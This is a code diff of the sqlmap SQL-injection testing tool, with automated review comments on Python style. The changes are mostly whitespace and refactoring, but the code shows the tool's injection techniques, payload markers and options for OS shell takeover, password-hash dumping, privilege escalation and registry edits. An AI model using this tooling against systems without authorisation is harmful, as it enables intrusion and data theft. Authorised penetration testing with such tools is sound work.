@@ -294,17 +294,21 @@ def cleanupPayload(self, payload, origValue=None): if payload is None: return - _ = ( - ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ - ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ - ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) - ) - payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) - - for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): + replacements = ( + ("[DELIMITER_START]", kb.chars.start), + ("[DELIMITER_STOP]", kb.chars.stop), + ("[AT_REPLACE]", kb.chars.at), + ("[SPACE_REPLACE]", kb.chars.space), + ("[DOLLAR_REPLACE]", kb.chars.dollar), + ("[HASH_REPLACE]", kb.chars.hash_), + ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) + ) + payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload) + + for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)): payload = payload.replace(_, str(randomInt())) - for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): + for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): payload = payload.replace(_, randomStr()) if origValue is not None and "[ORIGVALUE]" in payload: @@ -928,7 +932,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): limitedQuery += " %s" % limitStr elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - if not " ORDER BY " in limitedQuery: + if " ORDER BY " not in limitedQuery: limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT") elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery: limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")] diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 33ebed67a64..f12d23148dd 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py 
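Review bot: `payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)` relies on `reduce` being in scope; it is a builtin only on Python 2, so unless the module already imports it from `functools` (not visible in this hunk) the line breaks on Python 3. A plain loop, `for marker, value in replacements: payload = payload.replace(marker, value)`, says the same thing without the lambda and without that dependency. The move from `re.I` to an inline `(?i)` in the `[RANDNUM]`/`[RANDSTR]` patterns is equivalent. cleanupPayload's body continues outside the hunk.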
@@ -6,9 +6,9 @@
 """
 try:
- import cPickle as pickle
+ import cPickle as pickle
 except:
- import pickle
+ import pickle
 import bz2
 import itertools
diff --git a/lib/core/convert.py b/lib/core/convert.py
index c8ebaa0b303..7240655ef1a 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -94,7 +94,7 @@ def loads(str):
 try:
 retVal = loads(base64decode(value))
- except TypeError:
+ except TypeError:
 retVal = loads(base64decode(bytes(value)))
 return retVal
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index 209e0999e62..6c12164a155 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -8,20 +8,20 @@
 from lib.core.datatype import AttribDict
 _defaults = {
- "csvDel": ',',
- "timeSec": 5,
- "googlePage": 1,
- "verbose": 1,
- "delay": 0,
- "timeout": 30,
- "retries": 3,
- "saFreq": 0,
- "threads": 1,
- "level": 1,
- "risk": 1,
- "dumpFormat": "CSV",
- "tech": "BEUSTQ",
- "torType": "SOCKS5",
+ "csvDel": ',',
+ "timeSec": 5,
+ "googlePage": 1,
+ "verbose": 1,
+ "delay": 0,
+ "timeout": 30,
+ "retries": 3,
+ "saFreq": 0,
+ "threads": 1,
+ "level": 1,
+ "risk": 1,
+ "dumpFormat": "CSV",
+ "tech": "BEUSTQ",
+ "torType": "SOCKS5",
 }
 defaults = AttribDict(_defaults)
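Review bot: The re-indented `cPickle` fallback in bigarray.py still sits under a bare `except:`, which also swallows KeyboardInterrupt and SystemExit raised during import; since the only failure being handled is a missing module, `except ImportError:` is the intended scope and is worth fixing while the lines are being touched. The convert.py and defaults.py hunks on this line are whitespace-only.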
@@ -208,54 +208,60 @@ } SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", + ), - "SQL data definition": ( + "SQL data definition": ( "create ", "declare ", "drop ", "truncate ", - "alter ", ), + "alter ", + ), "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "load ", + ), - "SQL data control": ( - "grant ", - "revoke ", ), + "SQL data control": ( + "grant ", + "revoke ", + ), - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", + ), - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", + ), } POST_HINT_CONTENT_TYPES = { diff --git a/lib/core/enums.py b/lib/core/enums.py index 7759986845f..638b80bbb63 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py 
@@ -242,40 +242,40 @@ class REDIRECTION: class PAYLOAD: SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "inline query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "UNION query", - } + 1: "boolean-based blind", + 2: "error-based", + 3: "inline query", + 4: "stacked queries", + 5: "AND/OR time-based blind", + 6: "UNION query", + } PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } + 1: "Unescaped numeric", + 2: "Single quoted string", + 3: "LIKE single quoted string", + 4: "Double quoted string", + 5: "LIKE double quoted string", + } RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } + 0: "No risk", + 1: "Low risk", + 2: "Medium risk", + 3: "High risk", + } CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } + 0: "Always", + 1: "WHERE", + 2: "GROUP BY", + 3: "ORDER BY", + 4: "LIMIT", + 5: "OFFSET", + 6: "TOP", + 7: "Table name", + 8: "Column name", + } class METHOD: COMPARISON = "comparison" diff --git a/lib/core/option.py b/lib/core/option.py index e4fd1764b90..b842c890fe9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -687,7 +687,7 @@ def _setMetasploit(): if IS_WIN: try: - import win32file + __import__("win32file") except ImportError: errMsg = "sqlmap requires third-party module 'pywin32' " errMsg += "in order to use Metasploit functionalities on " @@ -700,7 +700,7 @@ def _(key, value): retVal = None try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE + from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) _ = OpenKey(_, key) retVal = QueryValueEx(_, value)[0] 
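Review bot: `__import__("win32file")` in _setMetasploit is a presence probe for pywin32, but written this way it reads like a leftover; a one-line comment such as `# probe only: raise ImportError early when pywin32 is missing` makes the intent clear, and `importlib.import_module("win32file")` is the documented form if importlib is already available in the module. The enums.py hunk on this line is whitespace-only. _setMetasploit's body continues outside the hunk.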
@@ -2350,7 +2350,7 @@ def _checkWebSocket():
 from websocket import ABNF
 except ImportError:
 errMsg = "sqlmap requires third-party module 'websocket-client' "
- errMsg += "in order to use WebSocket funcionality"
+ errMsg += "in order to use WebSocket functionality"
 raise SqlmapMissingDependence(errMsg)
 def _checkTor():
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index e71e4b3f179..b1f80398aea 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -6,250 +6,252 @@ """ optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - "sitemapUrl": "string", - }, - - "Request": { - "method": "string", - "data": "string", - "paramDel": "string", - "cookie": "string", - "cookieDel": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "authType": "string", - "authCred": "string", - "authFile": "string", - "ignoreCode": "integer", - "ignoreProxy": "boolean", - "ignoreRedirects": "boolean", - "ignoreTimeouts": "boolean", - "proxy": "string", - "proxyCred": "string", - "proxyFile": "string", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - "checkTor": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "rParam": "string", - "safeUrl": "string", - "safePost": "string", - "safeReqFile": "string", - "safeFreq": "integer", - "skipUrlEncode": "boolean", - "csrfToken": "string", - "csrfUrl": "string", - "forceSSL": "boolean", - "hpp": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "skip": "string", - "skipStatic": "boolean", - "paramExclude": "string", - "dbms": "string", - "dbmsCred": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "invalidString": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "tamper": 
"string", - }, - - "Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "uFrom": "string", - "dnsDomain": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": "boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "getComments": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "exclude": "string", - "pivotColumn": "string", - "dumpWhere": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - 
"regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "binaryFields": "string", - "charset": "string", - "checkInternet": "boolean", - "crawlDepth": "integer", - "crawlExclude": "string", - "csvDel": "string", - "dumpFormat": "string", - "encoding": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "harFile": "string", - "hexConvert": "boolean", - "outputDir": "string", - "parseErrors": "boolean", - "saveConfig": "string", - "scope": "string", - "testFilter": "string", - "testSkip": "string", - "updateAll": "boolean", - }, - - "Miscellaneous": { - "alert": "string", - "answers": "string", - "beep": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "identifyWaf": "boolean", - "mobile": "boolean", - "offline": "boolean", - "purgeOutput": "boolean", - "skipWaf": "boolean", - "smart": "boolean", - "tmpDir": "string", - "webRoot": "string", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "dummy": "boolean", - "disablePrecon": "boolean", - "profile": "boolean", - "forceDns": "boolean", - "murphyRate": "integer", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - }, - "API": { - "api": "boolean", - "taskid": "string", - "database": "string", - } - } + # Family: {"parameter name": "parameter datatype"}, + # --OR-- + # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")}, + + "Target": { + "direct": "string", + "url": "string", + "logFile": "string", + "bulkFile": "string", + "requestFile": "string", + "sessionFile": "string", + "googleDork": "string", + "configFile": "string", + "sitemapUrl": "string", + }, + + "Request": { + "method": "string", + "data": "string", + 
"paramDel": "string", + "cookie": "string", + "cookieDel": "string", + "loadCookies": "string", + "dropSetCookie": "boolean", + "agent": "string", + "randomAgent": "boolean", + "host": "string", + "referer": "string", + "headers": "string", + "authType": "string", + "authCred": "string", + "authFile": "string", + "ignoreCode": "integer", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", + "proxy": "string", + "proxyCred": "string", + "proxyFile": "string", + "tor": "boolean", + "torPort": "integer", + "torType": "string", + "checkTor": "boolean", + "delay": "float", + "timeout": "float", + "retries": "integer", + "rParam": "string", + "safeUrl": "string", + "safePost": "string", + "safeReqFile": "string", + "safeFreq": "integer", + "skipUrlEncode": "boolean", + "csrfToken": "string", + "csrfUrl": "string", + "forceSSL": "boolean", + "hpp": "boolean", + "evalCode": "string", + }, + + "Optimization": { + "optimize": "boolean", + "predictOutput": "boolean", + "keepAlive": "boolean", + "nullConnection": "boolean", + "threads": "integer", + }, + + "Injection": { + "testParameter": "string", + "skip": "string", + "skipStatic": "boolean", + "paramExclude": "string", + "dbms": "string", + "dbmsCred": "string", + "os": "string", + "invalidBignum": "boolean", + "invalidLogical": "boolean", + "invalidString": "boolean", + "noCast": "boolean", + "noEscape": "boolean", + "prefix": "string", + "suffix": "string", + "tamper": "string", + }, + + "Detection": { + "level": "integer", + "risk": "integer", + "string": "string", + "notString": "string", + "regexp": "string", + "code": "integer", + "textOnly": "boolean", + "titles": "boolean", + }, + + "Techniques": { + "tech": "string", + "timeSec": "integer", + "uCols": "string", + "uChar": "string", + "uFrom": "string", + "dnsDomain": "string", + "secondOrder": "string", + }, + + "Fingerprint": { + "extensiveFp": "boolean", + }, + + "Enumeration": { + "getAll": "boolean", + "getBanner": 
("boolean", "Banners"), + "getCurrentUser": ("boolean", "Users"), + "getCurrentDb": ("boolean", "Databases"), + "getHostname": "boolean", + "isDba": "boolean", + "getUsers": ("boolean", "Users"), + "getPasswordHashes": ("boolean", "Passwords"), + "getPrivileges": ("boolean", "Privileges"), + "getRoles": ("boolean", "Roles"), + "getDbs": ("boolean", "Databases"), + "getTables": ("boolean", "Tables"), + "getColumns": ("boolean", "Columns"), + "getSchema": "boolean", + "getCount": "boolean", + "dumpTable": "boolean", + "dumpAll": "boolean", + "search": "boolean", + "getComments": "boolean", + "db": "string", + "tbl": "string", + "col": "string", + "exclude": "string", + "pivotColumn": "string", + "dumpWhere": "string", + "user": "string", + "excludeSysDbs": "boolean", + "limitStart": "integer", + "limitStop": "integer", + "firstChar": "integer", + "lastChar": "integer", + "query": "string", + "sqlShell": "boolean", + "sqlFile": "string", + }, + + "Brute": { + "commonTables": "boolean", + "commonColumns": "boolean", + }, + + "User-defined function": { + "udfInject": "boolean", + "shLib": "string", + }, + + "File system": { + "rFile": "string", + "wFile": "string", + "dFile": "string", + }, + + "Takeover": { + "osCmd": "string", + "osShell": "boolean", + "osPwn": "boolean", + "osSmb": "boolean", + "osBof": "boolean", + "privEsc": "boolean", + "msfPath": "string", + "tmpPath": "string", + }, + + "Windows": { + "regRead": "boolean", + "regAdd": "boolean", + "regDel": "boolean", + "regKey": "string", + "regVal": "string", + "regData": "string", + "regType": "string", + }, + + "General": { + # "xmlFile": "string", + "trafficFile": "string", + "batch": "boolean", + "binaryFields": "string", + "charset": "string", + "checkInternet": "boolean", + "crawlDepth": "integer", + "crawlExclude": "string", + "csvDel": "string", + "dumpFormat": "string", + "encoding": "string", + "eta": "boolean", + "flushSession": "boolean", + "forms": "boolean", + "freshQueries": "boolean", + 
"harFile": "string", + "hexConvert": "boolean", + "outputDir": "string", + "parseErrors": "boolean", + "saveConfig": "string", + "scope": "string", + "testFilter": "string", + "testSkip": "string", + "updateAll": "boolean", + }, + + "Miscellaneous": { + "alert": "string", + "answers": "string", + "beep": "boolean", + "cleanup": "boolean", + "dependencies": "boolean", + "disableColoring": "boolean", + "googlePage": "integer", + "identifyWaf": "boolean", + "mobile": "boolean", + "offline": "boolean", + "purgeOutput": "boolean", + "skipWaf": "boolean", + "smart": "boolean", + "tmpDir": "string", + "webRoot": "string", + "wizard": "boolean", + "verbose": "integer", + }, + + "Hidden": { + "dummy": "boolean", + "disablePrecon": "boolean", + "profile": "boolean", + "forceDns": "boolean", + "murphyRate": "integer", + "smokeTest": "boolean", + "liveTest": "boolean", + "stopFail": "boolean", + "runCase": "string", + }, + + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", + } +} diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c8ede5a2d3d..c1bd8acd57b 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): """ try: + __import__("gobject") from thirdparty.gprof2dot import gprof2dot from thirdparty.xdot import xdot - import gobject import gtk import pydot except ImportError, e: diff --git a/lib/core/settings.py b/lib/core/settings.py index 93439d4abef..b72893f7004 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.22" +VERSION = "1.2.3.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
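Review bot: The rewritten `optDict` keeps the commented-out `# "xmlFile": "string",` entry under `"General"`, and the short `# Format:` explanation that preceded the schema comment has been dropped; either delete the dead entry or add a word on why it stays, and restore the one-line header so a reader knows the `Family: {"parameter name": ...}` lines describe the shape of the dictionary. The profiling.py hunk on this line moves `__import__("gobject")` ahead of the thirdparty imports, which only changes which missing module is reported first.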
@@ -224,7 +224,7 @@ MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", 
"RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") diff --git a/lib/core/shell.py b/lib/core/shell.py index b6c200755a4..3920d68f99e 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -104,20 +104,20 @@ def autoCompletion(completion=None, os=None, commands=None): if os == OS.WINDOWS: # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) + "copy": None, "del": None, "dir": None, + "echo": None, "md": None, "mem": None, + "move": None, "net": None, "netstat -na": None, + "ver": None, "xcopy": None, "whoami": None, + }) else: # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, "netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) + "cp": None, "rm": None, "ls": None, + "echo": None, "mkdir": None, "free": None, + "mv": None, "ifconfig": None, "netstat -natu": None, + "pwd": None, "uname": None, "id": None, + }) readline.set_completer(completer.complete) readline.parse_and_bind("tab: complete") diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py index e82f172cd17..b51a64bba2f 100644 --- a/lib/core/subprocessng.py +++ b/lib/core/subprocessng.py @@ -8,7 +8,6 @@ import errno import os import subprocess -import sys import time from lib.core.settings import IS_WIN @@ -24,11 +23,6 @@ import select import fcntl - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - def blockingReadFromFD(fd): # Quick twist around original Twisted function # Blocking read from a non-blocking file descriptor diff --git a/lib/core/target.py b/lib/core/target.py index d5ec2ccf92c..ab1aa2f6b9c 100644 
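Review bot: Dropping the `FCNTL` alias and the `sys` import from subprocessng.py is only safe if nothing further down the module still refers to `FCNTL` or `sys`; the hunk ends at the `blockingReadFromFD` header, so that cannot be confirmed from here and is worth a quick search of the file before merging. The settings.py and shell.py hunks on this line are whitespace-only.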
--- a/lib/core/target.py +++ b/lib/core/target.py @@ -232,7 +232,7 @@ def process(match, repl): kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"): + if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): warnMsg = "you've provided target URL without any GET " warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " @@ -377,7 +377,7 @@ def process(match, repl): if condition: conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} - conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders] + conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders] testableParameters = True if not conf.parameters: 
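Review bot: `conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]` is less readable than the tuple unpacking it replaces; `[(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]` names both fields instead of making the `_` placeholder do real work. If the rename was meant to avoid shadowing a `header`/`value` used later in the function, a short comment would say so. process()'s body continues outside the hunk.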
@@ -391,7 +391,7 @@ def process(match, repl): raise SqlmapGenericException(errMsg) if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): + if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}): errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken errMsg += "found in provided GET, POST, Cookie or header values" raise SqlmapGenericException(errMsg) @@ -449,13 +449,10 @@ def _resumeHashDBValues(): conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - + if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]: if not conf.tech or intersect(conf.tech, injection.data.keys()): if intersect(conf.tech, injection.data.keys()): injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech) - if injection not in kb.injections: kb.injections.append(injection) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 832884f31d8..3794d3ac231 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
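Review bot: `conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders)` lowercases the header names but not the token, so a token supplied in the usual mixed case of a header name never matches on that side and the "not found" error is raised even though the header is present; unless `conf.csrfToken` is normalized earlier (not visible here), compare `conf.csrfToken.lower()` there. The `_resumeHashDBValues` hunk on this line only joins a condition and drops blank lines.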
@@ -50,9 +50,7 @@ def cmdLineParser(argv=None): # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % _ if " " in _ else _) - + usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _) parser = OptionParser(usage=usage) try: @@ -115,15 +113,13 @@ def cmdLineParser(argv=None): request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in Netscape/wget format") - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", + request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true", help="Ignore Set-Cookie header from response") request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value") - request.add_option("--random-agent", dest="randomAgent", - action="store_true", + request.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value") request.add_option("--host", dest="host", 
